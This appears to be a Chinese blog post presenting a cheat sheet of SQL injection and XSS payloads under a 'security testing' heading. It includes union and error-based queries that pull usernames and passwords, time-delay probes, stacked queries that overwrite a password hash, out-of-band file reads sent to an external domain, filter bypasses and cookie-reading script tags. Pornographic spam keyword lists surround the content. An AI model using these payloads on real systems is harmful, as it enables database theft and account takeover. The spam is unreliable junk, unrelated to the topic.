<output id="qn6qe"></output>

    1. <output id="qn6qe"><tt id="qn6qe"></tt></output>
    2. <strike id="qn6qe"></strike>

      亚洲 日本 欧洲 欧美 视频,日韩中文字幕有码av,一本一道av中文字幕无码,国产线播放免费人成视频播放,人妻少妇偷人无码视频,日夜啪啪一区二区三区,国产尤物精品自在拍视频首页,久热这里只有精品12

      注入防范-安全測試

      SQL注入

      • 示例

      select * from <表名> where id = x and 1=1
      select * from <表名> where id = 'x' and '1'='1
      select id,name from test where id=1 or 1=1
      select * from table where name='2''
      select * from tables where title like '%
      http://127.0.0.1/XXX.php?title=t' and '1'='1' -- &action=search
      • SQL注入之Get注入

      http://127.0.0.1/XXX.php?title='union select 1,2,3,4,5,6,7 from INFORMATION_SCHEMA.tables --'&action=search
      http://127.0.0.1/XXX.php?title='union select 1, user(), database(), table_name,version(),6,7 from INFORMATION_SCHEMA.tables where table_schema=database() -- '&action=search
      http://127.0.0.1/XXX.php?title='union select 1, column_name,3,4,5,6,7 from INFORMATION_SCHEMA.columns where table_name = 'users' -- '&action=search
      http://127.0.0.1/XXX.php?title='union select 1, login,password,4,5,6,7 from users -- '&action=search
      • SQL注入之Post注入

      報文內容參數直接加'
      報文內容參數直接加union :
      union select 1,2 from INFORMATION_SCHKMA.tables -- &action=go
      union select 1,2,3,4,5,6,7 from INFORMATION_SCHKMA.tables -- &action=go
      union select user(), user(), database(),table_name,version(),user(),user() from INFORMATION_SCHEMA.tables-- &action=go
      •  SQL注入之Http頭注入

      報文頭之User-Agent內容改為123' #
      • SQL注入之布爾類型注入

      http://test.com/XXX?id=1 and substring(version(),1,1)=5
      • SQL注入之可聯合查詢類型注入

      http://test.com/XXX?id=1 UNION ALL SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA
      • SQL注入之時間延遲判斷類型注入

      select * from user where id= '4'  and sleep(3)
      http://127.0.0.1/XXX.php?id=1234' and length(database())=4 and sleep(3) -- &action=search
      http://127.0.0.1/XXX.php?id=1234' and substr(database(),1,1)=‘a' and sleep(3) -- &action=search
      http://127.0.0.1/XXX.php?id=1234' and length(version())=5 and sleep(3) -- &action=search
      http://127.0.0.1/XXX.php?id=1234' and ascii(substr(database(),1,1))=98 and sleep(3) -- &action=search,其中98對應ASCII表
      • SQL注入之報錯類型注入

      select floor(0.1),floor(0.51),floor(0.99)
      select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a;
      
      select rand() from information_schema.tables limit 0.10
      
      select count(*),concat((select user()),floor(rand(0)*2))x from test group by x
      
      select extractvalue('<a><b>test</b></a>','~wrong')
      select extractvalue('<a><b>test</b></a>',(select @@version))
      select extractvalue('<a><b>test</b></a>',concat((0x7e,select @@version)))   其中0x7e代表通信標識符~
      http://127.0.0.1/XXX.php?id=1' and extractvalue(1, concat(0x7e, (select @@version))) -- '
      http://127.0.0.1/XXX/?id=1' and extractvalue(1,concat(0x7e, (select @@version))) -- '&Submit=Submit#
      http://127.0.0.1/XXX/?id=1' and extractvalue(1, concat(0x7e,(select user()),0x7e,(select database()))) -- '&Submit=Submit#
      http://127.0.0.1/XXX/?id=1' and extractvalue(1, concat(0x7e,(select table_name from information_schema.tables where table_schema="xxx" limit 0,1))) -- '&Submit=Submit#
      http://127.0.0.1/XXX/?id=1' and extractvalue(1, concat(0x7e,(select table_name from information_schema.tables where table_schema=' xxx ' limit 1,1))) -- '&Submit=Submit#
      http://127.0.0.1/XXX/?id=1' and extractvalue(1, concat(0x7e,(select column_name from information_schema.columns where table_schema="users" limit 3,1))) –
      http://127.0.0.1/XXX/?id=1' and extractvalue(1, concat(0x7e, (select concat_ws(':',user,password) from xxx.users limit 0,1))) -- '&Submit=Submit#
      
      select updateXML('<a><b>test</b></a>','/a/b'.'updateXMLtest')
      http://127.0.0.1/XXX/?id=2' and updatexml(1,concat(0x7e,(SELECT @@version)),1) -- '
      
      select exp(~(select * from(select database())x))
      select exp(~(select * from (select user())x));
      
      select extractivalue(1,mid(concat(0x7e, (select concat_ws(':',user,password) from dvwa.users limit 0,1) ),1,29))
      •  SQL注入之多語句查詢注入(危險)

      http://127.0.0.1/XXX/?id=1;update t set name = 'a' where id=1
      • SQL注入之OOD注入

      select concat(to_base64(substr(load_file("C: \\MySQL5.7.26\\my.ini"),1,15)),".example.com") as result;
      select UTL_HTTP.request('http:// 127.0.0.1/test123.php'||'?id='||(select version from v$instance)) from dual
      • SQL注入之堆疊注入(危險)

      http://127.0.0.1/xxx/?id=1'; update users set password=e10adc3949ba59abbe56e057f20f883e' where user_id=1; - - &Submit=Submit#
      • SQL注入之預處理參數化查詢

      ?id=1 and 1=1
      ?id=1’ and 1=1 --+
      ?id=1%df’ and 1=1 --+
      • SQL注入之繞過策略

      1 || 1 = 1 1 && 1 = 1
      1 ||  (select user from users where user_id = 1)= 'admin'
      select * from test where id =1 || (select count(*) from test)>0
      1 || (select user from users limit 1,1)= 'admin'
      1 || (select min(user) from group by user_id having user_id)
      1 || select substr((select group_concat(name)name from test),1, 1) = 't'
      
      1 || substr(name, 1, 1)=unhex(74)
      1 || substr(name, 1, 1)=0x74
      
      1/**/||/**/binary(name)/**/=/**/0x74657374
      select/**/name/**/from/**/test/**/where/**/id/**/like/**/1
      http://127.0.0.1/XXX/?id=133 %df%27 union select 1,user(),3 %23
      • SQL注入之命令執行類型

      http://127.0.0.1/XXX.php?id=12 union select 1,2,Host,User,Password,6,7 from mysql.user limit 4,1 &action=go
      http://127.0.0.1/XXX.php?id=12 union select 1,2,@@basedir,@@@version,5,6,7 from mysql.user limit 0,1 &action=go

      XSS注入

      • 示例

      <script>alert(1)</script>
      <script>alert("點擊此處修復");location.</script>
      <script>alert(document.cookie)</script>
      <img src="a.png" onerror=alert(1)>
      <img src=x onerror=alert("xss")>
      <script>alert'xss'</script>
      <script>alert(/xss/)</script>
      <img src&#x3d;x onerror=alert("xss")>
      • XSS漏洞之模板注入

      請求報頭第一行等號后面參數改為%0a%3dglobal
      請求報頭第一行等號后面參數改為%0a%3d8*8
      請求報頭第一行等號后面參數改為8*8

      友鏈:五號黯區https://www.dark5.net

      posted @ 2022-05-07 11:43  布蘭黎  閱讀(137)  評論(0)    收藏  舉報
      主站蜘蛛池模板: 欧美精品国产综合久久| 国产女人喷潮视频免费| 欧美黑人XXXX性高清版| а√在线中文网新版地址在线 | 香蕉亚洲欧洲在线一区| 国产一区二区高清不卡| 妓院一钑片免看黄大片| 国产免费无遮挡吸奶头视频| 婷婷五月综合激情| 最近2019免费中文字幕8| 沐川县| 波多野结av在线无码中文免费| 国产精品色内内在线播放| 国产午夜在线观看视频| 久久人与动人物a级毛片| 亚洲精品美女一区二区| 久久国产福利播放| 郑州市| 一区二区三区黄色一级片| 午夜毛片不卡免费观看视频| 日韩精品一区二区午夜成人版| 国产高清在线精品一区二区三区 | 亚洲日本韩国欧美云霸高清| 久久精品国产亚洲av麻豆小说| 国产综合视频一区二区三区| 天堂资源国产老熟女在线| 精品成人免费自拍视频| 成人国产精品中文字幕| 亚洲av中文一区二区| 性奴sm虐辱暴力视频网站| 漂亮人妻被中出中文字幕| 人妻中文字幕av资源站| 免费无码成人AV片在线| 无码伊人久久大杳蕉中文无码| 国产又色又爽又黄的网站免费| 国产精品熟女一区二区不卡| 亚洲欧美在线一区中文字幕| 久久精品国产一区二区蜜芽| 在线看片免费人成视久网| 国产人妻精品午夜福利免费| 欧美色欧美亚洲高清在线视频|